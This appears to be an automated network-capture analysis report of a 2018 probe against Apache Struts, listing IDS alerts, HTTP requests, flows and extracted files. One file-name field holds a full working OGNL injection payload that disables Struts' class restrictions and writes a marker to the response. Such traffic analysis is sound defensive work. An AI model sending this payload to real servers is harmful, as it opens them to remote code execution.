58.218.56.81.pcap

MD5: 9edd55259d07c90621187deb2c71276f
Submission Date: 2018-07-15 20:25:52
Tags: rce cve-2013-2251
Alert 7
# | Timestamp | Src Ip | Dest Ip | Alert Signature | P
1 | 2018-07-13T17:27:23.400294-0700 | 58.218.56.81 | 172.17.0.2 | ET WEB_SPECIFIC_APPS Possible Apache Struts OGNL Expression Injection (CVE-2017-5638) (Content-Disposition) M1 | *
2 | 2018-07-13T17:27:33.499848-0700 | 58.218.56.81 | 172.17.0.2 | ET WEB_SPECIFIC_APPS Possible Apache Struts OGNL Expression Injection (CVE-2017-5638) M2 | *
3 | 2018-07-13T17:27:33.499848-0700 | 58.218.56.81 | 172.17.0.2 | ET WEB_SPECIFIC_APPS Possible Apache Struts OGNL Expression Injection (CVE-2017-5638) M3 | *
4 | 2018-07-13T17:27:33.406106-0700 | 58.218.56.81 | 172.17.0.2 | ET WEB_SPECIFIC_APPS Possible Apache Struts OGNL Expression Injection (CVE-2017-5638) M2 | *
5 | 2018-07-13T17:27:33.406106-0700 | 58.218.56.81 | 172.17.0.2 | ET WEB_SPECIFIC_APPS Possible Apache Struts OGNL Expression Injection (CVE-2017-5638) M3 | *
6 | 2018-07-13T17:27:33.668000-0700 | 58.218.56.81 | 172.17.0.2 | ET WEB_SERVER Possible Apache Struts OGNL Command Execution CVE-2013-2251 redirect | *
7 | 2018-07-13T17:27:33.590104-0700 | 58.218.56.81 | 172.17.0.2 | ET WEB_SERVER Possible Apache Struts OGNL Command Execution CVE-2013-2251 redirect | *
DNS 0
# | Timestamp | Src Ip | Dest Ip | Dns Type | Resource Record Name | Resource Record Type | Resource Data
No results found.
TLS 0
# | Timestamp | Source IP | Destination IP | TLS Version | Server Name Indication
No results found.
TFTP 0
# | Timestamp | Src Ip | Dest Ip | Tftp Packet | Tftp File | Tftp Mode
No results found.
HTTP 11
# | Timestamp | Source | Hostname | Port | Method | URL | Status
1 | 2018-07-13T17:27:34.167782-0700 | 58.218.56.81 | 192.144.141.68 | 80 | GET | /login.action/ | 404
2 | 2018-07-13T17:27:33.499848-0700 | 58.218.56.81 | 192.144.141.68 | 80 | GET | /login.action/ | 404
3 | 2018-07-13T17:27:33.668000-0700 | 58.218.56.81 | 192.144.141.68 | 80 | GET | /login.action/ | 404
4 | 2018-07-13T17:27:33.933671-0700 | 58.218.56.81 | 192.144.141.68 | 80 | GET | /login.action/ | 404
5 | 2018-07-13T17:27:34.349604-0700 | 58.218.56.81 | 192.144.141.68 | 80 | GET | /login.action/ | 404
6 | 2018-07-13T17:27:33.668172-0700 | 58.218.56.81 | 192.144.141.68 | 80 | POST | /login.action | 301
7 | 2018-07-13T17:27:33.668172-0700 | 58.218.56.81 | 192.144.141.68 | 80 | POST | /login.action | 301
8 | 2018-07-13T17:27:33.668172-0700 | 58.218.56.81 | 192.144.141.68 | 80 | POST | /login.action | 301
9 | 2018-07-13T17:27:33.668172-0700 | 58.218.56.81 | 192.144.141.68 | 80 | POST | /login.action | 301
10 | 2018-07-13T17:27:33.668172-0700 | 58.218.56.81 | 192.144.141.68 | 80 | POST | /login.action | 301
11 | 2018-07-13T17:27:33.668172-0700 | 58.218.56.81 | 192.144.141.68 | 80 | POST | /login.action | (not set)
SMB 0
# | Timestamp | Src Ip | Dest Ip | SMB Dialect | Command | Session | Tree
No results found.
SMTP 0
# | Timestamp | Source | Destination | Email From | Email To | Subject
No results found.
Flow 11
# | Timestamp | Flow Id | Event Type | Source | Source Port | Destination | Destination Port | Protocol | Host
1 | 2018-07-13T17:27:33.668172-0700 | 1698974229992955 | flow | 58.218.56.81 | 1507 | 172.17.0.2 | 80 | TCP | pcapanalyzer
2 | 2018-07-13T17:27:33.668172-0700 | 616262366781150 | flow | 58.218.56.81 | 1298 | 172.17.0.2 | 80 | TCP | pcapanalyzer
3 | 2018-07-13T17:27:33.668172-0700 | 1465587854550950 | flow | 58.218.56.81 | 1438 | 172.17.0.2 | 80 | TCP | pcapanalyzer
4 | 2018-07-13T17:27:33.668172-0700 | 777265658282936 | flow | 58.218.56.81 | 1317 | 172.17.0.2 | 80 | TCP | pcapanalyzer
5 | 2018-07-13T17:27:33.668172-0700 | 1765655744717327 | flow | 58.218.56.81 | 1337 | 172.17.0.2 | 80 | TCP | pcapanalyzer
6 | 2018-07-13T17:27:33.668172-0700 | 1771423885836707 | flow | 58.218.56.81 | 1468 | 172.17.0.2 | 80 | TCP | pcapanalyzer
7 | 2018-07-13T17:27:33.668172-0700 | 1772946451688112 | flow | 58.218.56.81 | 1411 | 172.17.0.2 | 80 | TCP | pcapanalyzer
8 | 2018-07-13T17:27:33.668172-0700 | 820477324240916 | flow | 58.218.56.81 | 1379 | 172.17.0.2 | 80 | TCP | pcapanalyzer
9 | 2018-07-13T17:27:33.668172-0700 | 1671353295349632 | flow | 58.218.56.81 | 1486 | 172.17.0.2 | 80 | TCP | pcapanalyzer
10 | 2018-07-13T17:27:33.668172-0700 | 124396269599595 | flow | 58.218.56.81 | 1355 | 172.17.0.2 | 80 | TCP | pcapanalyzer
11 | 2018-07-13T17:27:33.668172-0700 | 1534144121250173 | flow | 58.218.56.81 | 4268 | 172.17.0.2 | 80 | TCP | pcapanalyzer
File 10
# | Timestamp | Source | Destination | File Name | File Magic | File Size
1 | 2018-07-13T17:27:13.333679-0700 | 58.218.56.81 | 172.17.0.2 | %{(#test='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#req=@org.apache.struts2.ServletActionContext@getRequest()).(#res=@org.apache.struts2.ServletActionContext@getResponse()).(#res.setContentType('text/html;charset=UTF-8')).(#res.getWriter().print('security_')).(#res.getWriter().print('check')).(#res.getWriter().flush()).(#res.getWriter().close())}\0b | very short file (no magic) | 1
2 | 2018-07-13T17:27:33.758173-0700 | 58.218.56.81 | 172.17.0.2 | /login.action | ASCII text, with very long lines, with no line terminators | 484
3 | 2018-07-13T17:27:34.023076-0700 | 58.218.56.81 | 172.17.0.2 | /login.action | ASCII text, with very long lines, with no line terminators | 425
4 | 2018-07-13T17:27:34.167782-0700 | 172.17.0.2 | 58.218.56.81 | /login.action/ | XML 1.0 document, ASCII text | 340
5 | 2018-07-13T17:27:33.499848-0700 | 172.17.0.2 | 58.218.56.81 | /login.action/ | XML 1.0 document, ASCII text | 340
6 | 2018-07-13T17:27:33.532855-0700 | 58.218.56.81 | 172.17.0.2 | /login.action | ASCII text, with very long lines, with no line terminators | 471
7 | 2018-07-13T17:27:33.668000-0700 | 172.17.0.2 | 58.218.56.81 | /login.action/ | XML 1.0 document, ASCII text | 340
8 | 2018-07-13T17:27:33.933671-0700 | 172.17.0.2 | 58.218.56.81 | /login.action/ | XML 1.0 document, ASCII text | 340
9 | 2018-07-13T17:27:34.206898-0700 | 58.218.56.81 | 172.17.0.2 | /login.action | ASCII text, with very long lines, with no line terminators | 436
10 | 2018-07-13T17:27:34.349604-0700 | 172.17.0.2 | 58.218.56.81 | /login.action/ | XML 1.0 document, ASCII text | 340
